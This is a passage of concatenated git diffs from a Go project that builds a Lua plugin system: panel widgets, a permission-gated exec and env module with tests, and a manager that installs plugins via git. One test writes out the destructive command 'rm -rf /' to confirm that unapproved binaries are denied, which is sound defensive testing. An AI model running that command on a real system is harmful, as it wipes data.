+func NewPanelProxy(surface widgets.Surface, plugin *Plugin) *PanelProxy {
+	return &PanelProxy{
+		surface:    surface,
+		plugin:     plugin,
+		descCounts: make(map[WidgetKind]int),
+	}
+}
+
+func (pp *PanelProxy) Descriptors() []WidgetDesc { return pp.descs }
+func (pp *PanelProxy) UsedWidgets() bool         { return pp.usedWidgets }
+func (pp *PanelProxy) UsedRaw() bool             { return pp.usedRaw }
+
+func (pp *PanelProxy) appendDesc(kind WidgetKind, desc WidgetDesc) {
+	idx := pp.descCounts[kind]
+	pp.descCounts[kind] = idx + 1
+	desc.Kind = kind
+	desc.Key = fmt.Sprintf("%s:%d", kind, idx)
+	pp.descs = append(pp.descs, desc)
+	pp.usedWidgets = true
 }
 
 func RegisterPanelType(L *lua.LState) {
 	mt := L.NewTypeMetatable(panelTypeName)
 	L.SetField(mt, "__index", L.SetFuncs(L.NewTable(), map[string]lua.LGFunction{
-		"size":  panelSize,
-		"cell":  panelCell,
-		"text":  panelText,
-		"clear": panelClear,
+		"size":   panelSize,
+		"cell":   panelCell,
+		"text":   panelText,
+		"clear":  panelClear,
+		"label":  panelLabelWidget,
+		"tree":   panelTreeWidget,
+		"list":   panelListWidget,
+		"button": panelButtonWidget,
+		"input":  panelInputWidget,
+		"redraw": panelRedraw,
 	}))
 }
 
@@ -78,6 +108,15 @@ func resolveStyle(L *lua.LState, argPos int) term.Style {
 	return term.StyleDefault
 }
 
+func resolveStyleName(name string) term.Style {
+	if s, ok := styleMap[name]; ok {
+		return s
+	}
+	return term.StyleDefault
+}
+
+// Raw cell API
+
 func panelSize(L *lua.LState) int {
 	proxy := checkPanelProxy(L)
 	if proxy == nil {
@@ -94,6 +133,7 @@ func panelCell(L *lua.LState) int {
 	if proxy == nil {
 		return 0
 	}
+	proxy.usedRaw = true
 	x := int(L.CheckNumber(2))
 	y := int(L.CheckNumber(3))
 	ch := L.CheckString(4)
@@ -111,6 +151,7 @@ func panelText(L *lua.LState) int {
 	if proxy == nil {
 		return 0
 	}
+	proxy.usedRaw = true
 	x := int(L.CheckNumber(2))
 	y := int(L.CheckNumber(3))
 	text := L.CheckString(4)
@@ -126,11 +167,144 @@ func panelClear(L *lua.LState) int {
 	if proxy == nil {
 		return 0
 	}
+	proxy.usedRaw = true
 	x := int(L.CheckNumber(2))
 	y := int(L.CheckNumber(3))
 	w := int(L.CheckNumber(4))
 	h := int(L.CheckNumber(5))
 
 	proxy.surface.ClearRect(x, y, w, h, term.StyleDefault)
+	return 0
+}
+
+// Widget helpers
+
+func panelLabelWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	desc := WidgetDesc{}
+	arg := L.Get(2)
+
+	switch v := arg.(type) {
+	case lua.LString:
+		desc.Text = string(v)
+	case *lua.LTable:
+		if t := L.GetField(v, "text"); t != lua.LNil {
+			desc.Text = t.String()
+		}
+		if s := L.GetField(v, "style"); s != lua.LNil {
+			desc.TextStyle = s.String()
+		}
+	default:
+		desc.Text = arg.String()
+	}
+
+	proxy.appendDesc(WidgetLabel, desc)
+	return 0
+}
+
+func panelTreeWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{Indent: 2}
+
+	if items, ok := L.GetField(tbl, "items").(*lua.LTable); ok {
+		desc.Items = LuaTableToTreeNodes(L, items)
+	}
+	if v := L.GetField(tbl, "indent"); v != lua.LNil {
+		desc.Indent = int(lua.LVAsNumber(v))
+	}
+	if fn, ok := L.GetField(tbl, "on_select").(*lua.LFunction); ok {
+		desc.OnSelect = fn
+	}
+	if fn, ok := L.GetField(tbl, "on_expand").(*lua.LFunction); ok {
+		desc.OnExpand = fn
+	}
+
+	proxy.appendDesc(WidgetTree, desc)
+	return 0
+}
+
+func panelListWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if items, ok := L.GetField(tbl, "items").(*lua.LTable); ok {
+		desc.Items = LuaTableToTreeNodes(L, items)
+	}
+	if fn, ok := L.GetField(tbl, "on_select").(*lua.LFunction); ok {
+		desc.OnSelect = fn
+	}
+
+	proxy.appendDesc(WidgetList, desc)
+	return 0
+}
+
+func panelButtonWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if v := L.GetField(tbl, "label"); v != lua.LNil {
+		desc.Label = v.String()
+	}
+	if fn, ok := L.GetField(tbl, "on_click").(*lua.LFunction); ok {
+		desc.OnClick = fn
+	}
+
+	proxy.appendDesc(WidgetButton, desc)
+	return 0
+}
+
+func panelInputWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	tbl := L.CheckTable(2)
+	desc := WidgetDesc{}
+
+	if v := L.GetField(tbl, "placeholder"); v != lua.LNil {
+		desc.Placeholder = v.String()
+	}
+	if v := L.GetField(tbl, "prefix"); v != lua.LNil {
+		desc.Prefix = v.String()
+	}
+	if fn, ok := L.GetField(tbl, "on_change").(*lua.LFunction); ok {
+		desc.OnChange = fn
+	}
+	if fn, ok := L.GetField(tbl, "on_submit").(*lua.LFunction); ok {
+		desc.OnSubmit = fn
+	}
+
+	proxy.appendDesc(WidgetInput, desc)
+	return 0
+}
+
+func panelRedraw(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+	if proxy.plugin != nil && proxy.plugin.RequestRedraw != nil {
+		proxy.plugin.RequestRedraw()
+	}
 	return 0
 }

--- a/internal/plugin/lua_panel.go
+++ b/internal/plugin/lua_panel.go
@@ -68,6 +68,8 @@ func RegisterPanelType(L *lua.LState) {
 		"vstack":   panelVStackWidget,
 		"box":      panelBoxWidget,
 		"dropdown": panelDropdownWidget,
+		"title":    panelTitleWidget,
+		"keyvalue": panelKeyValueWidget,
 		"redraw":   panelRedraw,
 	}))
 }
@@ -201,11 +203,69 @@ func panelLabelWidget(L *lua.LState) int {
 		if s := L.GetField(v, "style"); s != lua.LNil {
 			desc.TextStyle = s.String()
 		}
+		if b := L.GetField(v, "badge"); b != lua.LNil {
+			desc.Badge = b.String()
+		}
+		parseBoxModel(L, v, &desc)
 	default:
 		desc.Text = arg.String()
 	}
 
 	proxy.appendDesc(WidgetLabel, desc)
+	return 0
+}
+
+func panelTitleWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	desc := WidgetDesc{}
+	arg := L.Get(2)
+
+	switch v := arg.(type) {
+	case lua.LString:
+		desc.Text = string(v)
+	case *lua.LTable:
+		if t := L.GetField(v, "text"); t != lua.LNil {
+			desc.Text = t.String()
+		}
+		parseBoxModel(L, v, &desc)
+	default:
+		desc.Text = arg.String()
+	}
+
+	proxy.appendDesc(WidgetTitle, desc)
+	return 0
+}
+
+func panelKeyValueWidget(L *lua.LState) int {
+	proxy := checkPanelProxy(L)
+	if proxy == nil {
+		return 0
+	}
+
+	desc := WidgetDesc{}
+	tbl := L.CheckTable(2)
+
+	tbl.ForEach(func(_, v lua.LValue) {
+		row, ok := v.(*lua.LTable)
+		if !ok {
+			return
+		}
+		entry := widgets.KeyValueEntry{}
+		if k := L.GetField(row, "key"); k != lua.LNil {
+			entry.Key = k.String()
+		}
+		if val := L.GetField(row, "value"); val != lua.LNil {
+			entry.Value = val.String()
+		}
+		desc.KeyValueEntries = append(desc.KeyValueEntries, entry)
+	})
+
+	parseBoxModel(L, tbl, &desc)
+	proxy.appendDesc(WidgetKeyValue, desc)
 	return 0
 }
 
@@ -311,6 +371,26 @@ func panelInputWidget(L *lua.LState) int {
 
 	proxy.appendDesc(WidgetInput, desc)
 	return 0
+}
+
+func parseBoxModel(L *lua.LState, tbl *lua.LTable, desc *WidgetDesc) {
+	for _, field := range []struct {
+		name string
+		dst  *int
+	}{
+		{"margin_top", &desc.MarginTop},
+		{"margin_bottom", &desc.MarginBottom},
+		{"margin_left", &desc.MarginLeft},
+		{"margin_right", &desc.MarginRight},
+		{"padding_top", &desc.PaddingTop},
+		{"padding_bottom", &desc.PaddingBottom},
+		{"padding_left", &desc.PaddingLeft},
+		{"padding_right", &desc.PaddingRight},
+	} {
+		if v := L.GetField(tbl, field.name); v != lua.LNil {
+			*field.dst = int(lua.LVAsNumber(v))
+		}
+	}
 }
 
 func parseLuaMenuEntries(L *lua.LState, tbl *lua.LTable) []widgets.MenuEntry {

--- a/internal/plugin/lua_system.go
+++ b/internal/plugin/lua_system.go
@@ -1,0 +1,132 @@
+package plugin
+
+import (
+	"log/slog"
+
+	lua "github.com/yuin/gopher-lua"
+)
+
+func setupSystemModule(L *lua.LState, p *Plugin) {
+	loader := func(L *lua.LState) int {
+		mod := L.NewTable()
+
+		hasExec := len(p.Granted.SystemExec) > 0
+		hasEnv := p.Granted.Check("system.env") == nil
+
+		if hasExec {
+			L.SetField(mod, "exec", L.NewFunction(sysExec(p)))
+			L.SetField(mod, "exec_async", L.NewFunction(sysExecAsync(p)))
+		}
+
+		if hasEnv {
+			L.SetField(mod, "env", L.NewFunction(sysEnv(p)))
+		}
+
+		L.Push(mod)
+		return 1
+	}
+
+	L.PreloadModule("ttt.system", loader)
+}
+
+func sysExec(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.System == nil {
+			L.ArgError(1, "system API not available")
+			return 0
+		}
+		binary := L.CheckString(1)
+		if err := p.Granted.CheckExec(binary); err != nil {
+			L.ArgError(1, err.Error())
+			return 0
+		}
+
+		var args []string
+		if argsTbl, ok := L.Get(2).(*lua.LTable); ok {
+			argsTbl.ForEach(func(_, v lua.LValue) {
+				args = append(args, v.String())
+			})
+		}
+
+		stdout, stderr, exitCode, err := p.System.Exec(binary, args)
+		if err != nil {
+			tbl := L.NewTable()
+			L.SetField(tbl, "stdout", lua.LString(""))
+			L.SetField(tbl, "stderr", lua.LString(err.Error()))
+			L.SetField(tbl, "exit_code", lua.LNumber(-1))
+			L.Push(tbl)
+			return 1
+		}
+
+		tbl := L.NewTable()
+		L.SetField(tbl, "stdout", lua.LString(stdout))
+		L.SetField(tbl, "stderr", lua.LString(stderr))
+		L.SetField(tbl, "exit_code", lua.LNumber(exitCode))
+		L.Push(tbl)
+		return 1
+	}
+}
+
+func sysExecAsync(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.System == nil {
+			L.ArgError(1, "system API not available")
+			return 0
+		}
+		binary := L.CheckString(1)
+		if err := p.Granted.CheckExec(binary); err != nil {
+			L.ArgError(1, err.Error())
+			return 0
+		}
+
+		var args []string
+		if argsTbl, ok := L.Get(2).(*lua.LTable); ok {
+			argsTbl.ForEach(func(_, v lua.LValue) {
+				args = append(args, v.String())
+			})
+		}
+
+		callback := L.CheckFunction(3)
+
+		go func() {
+			stdout, stderr, exitCode, err := p.System.Exec(binary, args)
+
+			resultFn := func() {
+				tbl := p.State.NewTable()
+				if err != nil {
+					p.State.SetField(tbl, "stdout", lua.LString(""))
+					p.State.SetField(tbl, "stderr", lua.LString(err.Error()))
+					p.State.SetField(tbl, "exit_code", lua.LNumber(-1))
+				} else {
+					p.State.SetField(tbl, "stdout", lua.LString(stdout))
+					p.State.SetField(tbl, "stderr", lua.LString(stderr))
+					p.State.SetField(tbl, "exit_code", lua.LNumber(exitCode))
+				}
+				if callErr := p.CallLuaFunc(callback, tbl); callErr != nil {
+					slog.Error("plugin async exec callback error", "plugin", p.Name, "error", callErr)
+				}
+			}
+
+			if p.PostAsync != nil {
+				p.PostAsync(&PluginAsyncResult{
+					Plugin:   p,
+					Callback: resultFn,
+				})
+			}
+		}()
+
+		return 0
+	}
+}
+
+func sysEnv(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.System == nil {
+			L.Push(lua.LString(""))
+			return 1
+		}
+		name := L.CheckString(1)
+		L.Push(lua.LString(p.System.Env(name)))
+		return 1
+	}
+}

--- a/internal/plugin/lua_system_test.go
+++ b/internal/plugin/lua_system_test.go
@@ -1,0 +1,150 @@
+package plugin
+
+import (
+	"fmt"
+	"testing"
+)
+
+type mockSystemAPI struct {
+	execBinary string
+	execArgs   []string
+	stdout     string
+	stderr     string
+	exitCode   int
+	execErr    error
+	envVars    map[string]string
+}
+
+func (m *mockSystemAPI) Exec(binary string, args []string) (string, string, int, error) {
+	m.execBinary = binary
+	m.execArgs = args
+	return m.stdout, m.stderr, m.exitCode, m.execErr
+}
+
+func (m *mockSystemAPI) Env(name string) string {
+	if m.envVars != nil {
+		return m.envVars[name]
+	}
+	return ""
+}
+
+func setupTestPluginWithSystem(perms PermissionSet, sys *mockSystemAPI) (*Plugin, func()) {
+	p, cleanup := newTestPluginBase(perms)
+	p.System = sys
+	return p, cleanup
+}
+
+func TestSystemExec(t *testing.T) {
+	mock := &mockSystemAPI{stdout: "container1\ncontainer2\n", exitCode: 0}
+	p, cleanup := setupTestPluginWithSystem(
+		PermissionSet{SystemExec: []string{"docker"}},
+		mock,
+	)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local sys = require("ttt.system")
+		local result = sys.exec("docker", {"ps", "--format", "{{.Names}}"})
+		_G.stdout = result.stdout
+		_G.exit_code = result.exit_code
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("stdout").String() != "container1\ncontainer2\n" {
+		t.Errorf("unexpected stdout: %q", p.State.GetGlobal("stdout").String())
+	}
+	if mock.execBinary != "docker" {
+		t.Errorf("expected binary 'docker', got %q", mock.execBinary)
+	}
+	if len(mock.execArgs) != 3 || mock.execArgs[0] != "ps" {
+		t.Errorf("unexpected args: %v", mock.execArgs)
+	}
+}
+
+func TestSystemExecDeniedBinary(t *testing.T) {
+	mock := &mockSystemAPI{}
+	p, cleanup := setupTestPluginWithSystem(
+		PermissionSet{SystemExec: []string{"docker"}},
+		mock,
+	)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local sys = require("ttt.system")
+		sys.exec("rm", {"-rf", "/"})
+	`)
+	if err == nil {
+		t.Fatal("expected error for unapproved binary")
+	}
+}
+
+func TestSystemExecError(t *testing.T) {
+	mock := &mockSystemAPI{execErr: fmt.Errorf("command not found")}
+	p, cleanup := setupTestPluginWithSystem(
+		PermissionSet{SystemExec: []string{"missing"}},
+		mock,
+	)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local sys = require("ttt.system")
+		local result = sys.exec("missing", {})
+		_G.stderr = result.stderr
+		_G.code = result.exit_code
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("code").String() != "-1" {
+		t.Errorf("expected exit code -1, got %s", p.State.GetGlobal("code").String())
+	}
+}
+
+func TestSystemEnv(t *testing.T) {
+	mock := &mockSystemAPI{envVars: map[string]string{"HOME": "/home/test"}}
+	p, cleanup := setupTestPluginWithSystem(
+		PermissionSet{SystemEnv: true},
+		mock,
+	)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local sys = require("ttt.system")
+		_G.home = sys.env("HOME")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("home").String() != "/home/test" {
+		t.Errorf("expected '/home/test', got %q", p.State.GetGlobal("home").String())
+	}
+}
+
+func TestSystemNoExecPermission(t *testing.T) {
+	mock := &mockSystemAPI{}
+	p, cleanup := setupTestPluginWithSystem(PermissionSet{}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local sys = require("ttt.system")
+		sys.exec("ls", {})
+	`)
+	if err == nil {
+		t.Fatal("expected error when system.exec not granted")
+	}
+}
+
+func TestSystemNoEnvPermission(t *testing.T) {
+	mock := &mockSystemAPI{}
+	p, cleanup := setupTestPluginWithSystem(PermissionSet{}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local sys = require("ttt.system")
+		sys.env("HOME")
+	`)
+	if err == nil {
+		t.Fatal("expected error when system.env not granted")
+	}
+}

--- a/internal/plugin/manager.go
+++ b/internal/plugin/manager.go
@@ -28,13 +28,14 @@ type Manager struct {
 	plugins    []*Plugin
 	registry   *Registry
 	pluginsDir string
+	extraDirs  []string
 
 	SidebarPanels []SidebarRegistration
 	BottomPanels  []BottomRegistration
 }
 
-func NewManager(pluginsDir string) *Manager {
-	return &Manager{pluginsDir: pluginsDir}
+func NewManager(pluginsDir string, extraDirs ...string) *Manager {
+	return &Manager{pluginsDir: pluginsDir, extraDirs: extraDirs}
 }
 
 func (m *Manager) LoadAll() []*Plugin {
@@ -48,56 +49,63 @@ func (m *Manager) LoadAll() []*Plugin {
 	}
 	m.registry = reg
 
-	entries, err := os.ReadDir(m.pluginsDir)
-	if err != nil {
-		slog.Error("read plugins directory", "error", err)
-		return nil
-	}
-
 	var needsApproval []*Plugin
+	seen := map[string]bool{}
 
-	for _, entry := range entries {
-		if !entry.IsDir() {
-			continue
-		}
-
-		dir := m.pluginsDir + "/" + entry.Name()
-		manifest, err := LoadManifest(dir)
+	dirs := append([]string{m.pluginsDir}, m.extraDirs...)
+	for _, pluginDir := range dirs {
+		entries, err := os.ReadDir(pluginDir)
 		if err != nil {
-			slog.Warn("skip plugin", "dir", entry.Name(), "error", err)
 			continue
 		}
+		for _, entry := range entries {
+			if !entry.IsDir() {
+				continue
+			}
 
-		p := &Plugin{
-			Name:     manifest.Name,
-			Dir:      dir,
-			Manifest: manifest,
+			dir := filepath.Join(pluginDir, entry.Name())
+			manifest, err := LoadManifest(dir)
+			if err != nil {
+				slog.Warn("skip plugin", "dir", entry.Name(), "error", err)
+				continue
+			}
+
+			if seen[manifest.Name] {
+				continue
+			}
+			seen[manifest.Name] = true
+
+			p := &Plugin{
+				Name:     manifest.Name,
+				Dir:      dir,
+				Manifest: manifest,
+			}
+
+			regEntry := m.registry.Find(manifest.Name)
+			if regEntry == nil {
+				needsApproval = append(needsApproval, p)
+				continue
+			}
+
+			if !regEntry.Enabled {
+				continue
+			}
+
+			diff := DiffPermissions(regEntry.Permissions, manifest.Permissions)
+			if !diff.IsEmpty() {
+				regEntry.Enabled = false
+				needsApproval = append(needsApproval, p)
+				continue
+			}
+
+			p.Granted = regEntry.Permissions
+			if err := p.Init(); err != nil {
+				continue
+			}
+
+			m.plugins = append(m.plugins, p)
+			m.collectRegistrations(p)
 		}
-
-		regEntry := m.registry.Find(manifest.Name)
-		if regEntry == nil {
-			needsApproval = append(needsApproval, p)
-			continue
-		}
-
-		if !regEntry.Enabled {
-			continue
-		}
-
-		diff := DiffPermissions(regEntry.Permissions, manifest.Permissions)
-		if !diff.IsEmpty() {
-			regEntry.Enabled = false
-			needsApproval = append(needsApproval, p)
-			continue
-		}
-
-		p.Granted = regEntry.Permissions
-		if err := p.Init(); err != nil {
-			continue
-		}
-
-		m.plugins = append(m.plugins, p)
-		m.collectRegistrations(p)
 	}
 
 	return needsApproval

--- a/internal/plugin/manager.go
+++ b/internal/plugin/manager.go
@@ -13,12 +13,19 @@ type SidebarRegistration struct {
 	Widget *PluginPanelWidget
 }
 
+type BottomRegistration struct {
+	ID     string
+	Title  string
+	Widget *PluginPanelWidget
+}
+
 type Manager struct {
 	plugins    []*Plugin
 	registry   *Registry
 	pluginsDir string
 
 	SidebarPanels []SidebarRegistration
+	BottomPanels  []BottomRegistration
 }
 
 func NewManager(pluginsDir string) *Manager {
@@ -96,7 +103,14 @@ func (m *Manager) collectRegistrations(p *Plugin) {
 		m.SidebarPanels = append(m.SidebarPanels, SidebarRegistration{
 			ID:     "plugin." + p.Name,
 			Title:  p.SidebarTitle,
-			Widget: NewPluginPanelWidget(p),
+			Widget: NewPluginPanelWidget(p, p.RenderFunc, p.EventFunc),
+		})
+	}
+	if p.BottomTitle != "" && p.BottomRenderFunc != nil {
+		m.BottomPanels = append(m.BottomPanels, BottomRegistration{
+			ID:     "plugin." + p.Name,
+			Title:  p.BottomTitle,
+			Widget: NewPluginPanelWidget(p, p.BottomRenderFunc, p.BottomEventFunc),
 		})
 	}
 }

--- a/internal/plugin/manager.go
+++ b/internal/plugin/manager.go
@@ -1,8 +1,12 @@
 package plugin
 
 import (
+	"fmt"
 	"log/slog"
 	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
 
 	"github.com/eugenioenko/ttt/internal/config"
 	lua "github.com/yuin/gopher-lua"
@@ -121,7 +125,7 @@ func (m *Manager) ApproveAndLoad(p *Plugin) error {
 
 	m.registry.AddOrUpdate(
 		p.Manifest.Name,
-		"",
+		p.Repo,
 		p.Manifest.Version,
 		p.Manifest.Permissions,
 	)
@@ -180,6 +184,197 @@ func (m *Manager) DispatchEvent(name string, args ...interface{}) {
 		}
 		p.DispatchEvent(name, largs...)
 	}
+}
+
+func (m *Manager) Install(repoURL string) (*Plugin, error) {
+	name := filepath.Base(repoURL)
+	name = strings.TrimSuffix(name, ".git")
+	if name == "" || name == "." {
+		return nil, fmt.Errorf("invalid repository URL")
+	}
+
+	targetDir := filepath.Join(m.pluginsDir, name)
+	if _, err := os.Stat(targetDir); err == nil {
+		return nil, fmt.Errorf("plugin %q already exists", name)
+	}
+
+	cmd := exec.Command("git", "clone", repoURL, targetDir)
+	if out, err := cmd.CombinedOutput(); err != nil {
+		return nil, fmt.Errorf("git clone failed: %s: %s", err, strings.TrimSpace(string(out)))
+	}
+
+	manifest, err := LoadManifest(targetDir)
+	if err != nil {
+		os.RemoveAll(targetDir)
+		return nil, fmt.Errorf("invalid plugin: %w", err)
+	}
+
+	return &Plugin{
+		Name:     manifest.Name,
+		Dir:      targetDir,
+		Repo:     repoURL,
+		Manifest: manifest,
+	}, nil
+}
+
+func (m *Manager) Uninstall(name string) error {
+	for i, p := range m.plugins {
+		if p.Name == name {
+			p.Destroy()
+			m.plugins = append(m.plugins[:i], m.plugins[i+1:]...)
+			break
+		}
+	}
+
+	dir := filepath.Join(m.pluginsDir, name)
+	if err := os.RemoveAll(dir); err != nil {
+		slog.Error("remove plugin directory", "error", err)
+	}
+
+	m.registry.Remove(name)
+	if err := m.registry.Save(); err != nil {
+		slog.Error("save plugin registry", "error", err)
+	}
+
+	for i, reg := range m.SidebarPanels {
+		if reg.ID == "plugin."+name {
+			m.SidebarPanels = append(m.SidebarPanels[:i], m.SidebarPanels[i+1:]...)
+			break
+		}
+	}
+	for i, reg := range m.BottomPanels {
+		if reg.ID == "plugin."+name {
+			m.BottomPanels = append(m.BottomPanels[:i], m.BottomPanels[i+1:]...)
+			break
+		}
+	}
+
+	return nil
+}
+
+func (m *Manager) Update(name string) (*Plugin, bool, error) {
+	dir := filepath.Join(m.pluginsDir, name)
+	if _, err := os.Stat(dir); os.IsNotExist(err) {
+		return nil, false, fmt.Errorf("plugin %q not found", name)
+	}
+
+	cmd := exec.Command("git", "-C", dir, "pull")
+	if out, err := cmd.CombinedOutput(); err != nil {
+		return nil, false, fmt.Errorf("git pull failed: %s: %s", err, strings.TrimSpace(string(out)))
+	}
+
+	newManifest, err := LoadManifest(dir)
+	if err != nil {
+		return nil, false, fmt.Errorf("invalid manifest after update: %w", err)
+	}
+
+	regEntry := m.registry.Find(name)
+	if regEntry == nil {
+		p := &Plugin{Name: newManifest.Name, Dir: dir, Manifest: newManifest}
+		return p, true, nil
+	}
+
+	diff := DiffPermissions(regEntry.Permissions, newManifest.Permissions)
+	if !diff.IsEmpty() {
+		for i, p := range m.plugins {
+			if p.Name == name {
+				p.Destroy()
+				m.plugins = append(m.plugins[:i], m.plugins[i+1:]...)
+				break
+			}
+		}
+		regEntry.Enabled = false
+		m.registry.Save()
+		p := &Plugin{Name: newManifest.Name, Dir: dir, Manifest: newManifest}
+		return p, true, nil
+	}
+
+	for _, p := range m.plugins {
+		if p.Name == name {
+			p.Destroy()
+			p.Manifest = newManifest
+			if err := p.Init(); err != nil {
+				return nil, false, err
+			}
+			m.collectRegistrations(p)
+			regEntry.Version = newManifest.Version
+			m.registry.Save()
+			return nil, false, nil
+		}
+	}
+
+	return nil, false, nil
+}
+
+func (m *Manager) SetEnabled(name string, enabled bool) error {
+	m.registry.SetEnabled(name, enabled)
+	if err := m.registry.Save(); err != nil {
+		return err
+	}
+
+	if !enabled {
+		for i, p := range m.plugins {
+			if p.Name == name {
+				p.Destroy()
+				m.plugins = append(m.plugins[:i], m.plugins[i+1:]...)
+				break
+			}
+		}
+		return nil
+	}
+
+	dir := filepath.Join(m.pluginsDir, name)
+	manifest, err := LoadManifest(dir)
+	if err != nil {
+		return err
+	}
+
+	regEntry := m.registry.Find(name)
+	if regEntry == nil {
+		return fmt.Errorf("plugin %q not in registry", name)
+	}
+
+	p := &Plugin{
+		Name:     manifest.Name,
+		Dir:      dir,
+		Manifest: manifest,
+		Granted:  regEntry.Permissions,
+	}
+	if err := p.Init(); err != nil {
+		return err
+	}
+
+	m.plugins = append(m.plugins, p)
+	m.collectRegistrations(p)
+	return nil
+}
+
+func (m *Manager) PluginsDir() string {
+	return m.pluginsDir
+}
+
+func (m *Manager) Registry() *Registry {
+	return m.registry
+}
+
+func (m *Manager) InstalledPluginNames() []string {
+	if m.registry == nil {
+		return nil
+	}
+	var names []string
+	for _, e := range m.registry.Entries {
+		names = append(names, e.Name)
+	}
+	return names
+}
+
+func (m *Manager) FindPlugin(name string) *Plugin {
+	for _, p := range m.plugins {
+		if p.Name == name {
+			return p
+		}
+	}
+	return nil
 }
 
 func (m *Manager) Shutdown() {

--- a/internal/plugin/manager.go
+++ b/internal/plugin/manager.go
@@ -166,6 +166,12 @@ func (m *Manager) SetNetworkAPI(api NetworkAPI) {
 	}
 }
 
+func (m *Manager) SetLogFactory(factory func(pluginName string) func(level, message string)) {
+	for _, p := range m.plugins {
+		p.Log = factory(p.Name)
+	}
+}
+
 func (m *Manager) DispatchEvent(name string, args ...interface{}) {
 	for _, p := range m.plugins {
 		if p.State == nil || len(p.EventListeners[name]) == 0 {
@@ -347,6 +353,64 @@ func (m *Manager) SetEnabled(name string, enabled bool) error {
 	m.plugins = append(m.plugins, p)
 	m.collectRegistrations(p)
 	return nil
+}
+
+func (m *Manager) Reload(name string) (*Plugin, error) {
+	var old *Plugin
+	var idx int
+	for i, p := range m.plugins {
+		if p.Name == name {
+			old = p
+			idx = i
+			break
+		}
+	}
+	if old == nil {
+		return nil, fmt.Errorf("plugin %q not loaded", name)
+	}
+
+	granted := old.Granted
+	repo := old.Repo
+	dir := old.Dir
+	logFn := old.Log
+
+	old.Destroy()
+
+	manifest, err := LoadManifest(dir)
+	if err != nil {
+		m.plugins = append(m.plugins[:idx], m.plugins[idx+1:]...)
+		return nil, fmt.Errorf("reload manifest: %w", err)
+	}
+
+	p := &Plugin{
+		Name:     manifest.Name,
+		Dir:      dir,
+		Repo:     repo,
+		Manifest: manifest,
+		Granted:  granted,
+		Log:      logFn,
+	}
+
+	if err := p.Init(); err != nil {
+		m.plugins = append(m.plugins[:idx], m.plugins[idx+1:]...)
+		return nil, fmt.Errorf("reload init: %w", err)
+	}
+
+	m.plugins[idx] = p
+
+	for i := len(m.SidebarPanels) - 1; i >= 0; i-- {
+		if m.SidebarPanels[i].ID == "plugin."+name {
+			m.SidebarPanels = append(m.SidebarPanels[:i], m.SidebarPanels[i+1:]...)
+		}
+	}
+	for i := len(m.BottomPanels) - 1; i >= 0; i-- {
+		if m.BottomPanels[i].ID == "plugin."+name {
+			m.BottomPanels = append(m.BottomPanels[:i], m.BottomPanels[i+1:]...)
+		}
+	}
+	m.collectRegistrations(p)
+
+	return p, nil
 }
 
 func (m *Manager) PluginsDir() string {

--- a/internal/plugin/manager.go
+++ b/internal/plugin/manager.go
@@ -5,6 +5,7 @@ import (
 	"os"
 
 	"github.com/eugenioenko/ttt/internal/config"
+	lua "github.com/yuin/gopher-lua"
 )
 
 type SidebarRegistration struct {
@@ -135,6 +136,50 @@ func (m *Manager) ApproveAndLoad(p *Plugin) error {
 	m.plugins = append(m.plugins, p)
 	m.collectRegistrations(p)
 	return nil
+}
+
+func (m *Manager) SetEditorAPI(api EditorAPI) {
+	for _, p := range m.plugins {
+		p.Editor = api
+	}
+}
+
+func (m *Manager) SetFilesystemAPI(api FilesystemAPI) {
+	for _, p := range m.plugins {
+		p.Filesystem = api
+	}
+}
+
+func (m *Manager) SetSystemAPI(api SystemAPI) {
+	for _, p := range m.plugins {
+		p.System = api
+	}
+}
+
+func (m *Manager) SetNetworkAPI(api NetworkAPI) {
+	for _, p := range m.plugins {
+		p.Network = api
+	}
+}
+
+func (m *Manager) DispatchEvent(name string, args ...interface{}) {
+	for _, p := range m.plugins {
+		if p.State == nil || len(p.EventListeners[name]) == 0 {
+			continue
+		}
+		var largs []lua.LValue
+		for _, a := range args {
+			switch v := a.(type) {
+			case string:
+				largs = append(largs, lua.LString(v))
+			case int:
+				largs = append(largs, lua.LNumber(v))
+			case bool:
+				largs = append(largs, lua.LBool(v))
+			}
+		}
+		p.DispatchEvent(name, largs...)
+	}
 }
 
 func (m *Manager) Shutdown() {

--- a/internal/plugin/manager.go
+++ b/internal/plugin/manager.go
@@ -1,0 +1,138 @@
+package plugin
+
+import (
+	"log/slog"
+	"os"
+
+	"github.com/eugenioenko/ttt/internal/config"
+)
+
+type SidebarRegistration struct {
+	ID     string
+	Title  string
+	Widget *PluginPanelWidget
+}
+
+type Manager struct {
+	plugins    []*Plugin
+	registry   *Registry
+	pluginsDir string
+
+	SidebarPanels []SidebarRegistration
+}
+
+func NewManager(pluginsDir string) *Manager {
+	return &Manager{pluginsDir: pluginsDir}
+}
+
+func (m *Manager) LoadAll() []*Plugin {
+	os.MkdirAll(m.pluginsDir, 0755)
+
